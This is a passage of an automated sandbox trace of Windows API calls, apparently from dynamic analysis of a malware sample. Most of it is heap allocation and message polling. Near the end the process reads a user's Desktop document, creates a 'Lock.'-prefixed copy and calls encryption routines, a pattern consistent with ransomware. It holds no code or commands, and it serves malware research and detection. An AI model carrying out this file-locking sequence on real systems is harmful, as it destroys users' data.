dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0185.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0185.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0185.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0185.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0185.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0185.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0185.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0185.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0185.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0185.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0185.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0185.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0185.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0185.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0185.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0185.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0185.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0185.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0185.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0185.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0185.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0185.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0185.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0185.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0185.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0185.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0185.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0185.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0185.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0185.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0185.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0185.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0185.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0185.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0185.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0185.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0185.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0185.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0185.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0185.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0185.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0185.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0185.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0185.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0185.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0185.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0185.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0185.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0185.973] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0185.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0185.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0185.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0185.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0185.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0185.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0185.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0185.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0185.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0185.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0185.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0185.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0185.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0185.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0185.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0185.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0185.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0185.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0185.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0185.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0185.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0185.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0185.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0185.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0185.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0185.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0185.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0185.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0185.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0185.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0185.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0185.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0185.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0185.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0185.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0185.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0185.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0185.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0185.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0185.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0185.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0185.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0185.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0185.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0185.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0185.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0185.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0185.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0185.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0185.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0185.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0185.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0185.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0185.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0185.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0185.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0185.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0185.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0185.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0185.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0185.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0185.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0185.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0185.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0185.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0185.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0185.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0185.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0185.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0185.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0185.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0185.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0185.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0185.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0185.976] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0185.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0185.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0185.976] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0185.976] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0185.976] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0185.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0185.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0185.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0185.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0185.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0185.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0185.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0185.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0185.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0185.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0185.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0185.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0185.978] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/IqAWqPLMQZePl.doc" (normalized: "c:\\users\\fd1hvy\\desktop\\iqawqplmqzepl.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0185.979] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.979] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0185.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0185.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0185.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0185.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0185.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0185.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0185.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0185.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0185.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0185.979] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0185.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0185.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0185.980] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0185.980] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0185.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0185.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0185.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0185.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0185.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0185.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0185.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0185.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0185.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0185.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0185.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0185.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0185.981] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0185.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0185.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0185.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0185.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f14010 [0185.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0185.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0185.981] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.IqAWqPLMQZePl.doc" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.iqawqplmqzepl.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0185.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0185.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0185.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0185.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0185.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0185.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0185.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0185.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0185.982] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.982] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.982] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.982] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.986] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0185.987] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x4323, lpOverlapped=0x0) returned 1 [0185.989] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0185.993] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.993] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.993] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.994] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0185.994] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.994] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.994] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.994] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.994] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.994] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.994] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0185.994] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0185.994] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0185.994] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0185.994] PeekMessageW (in: 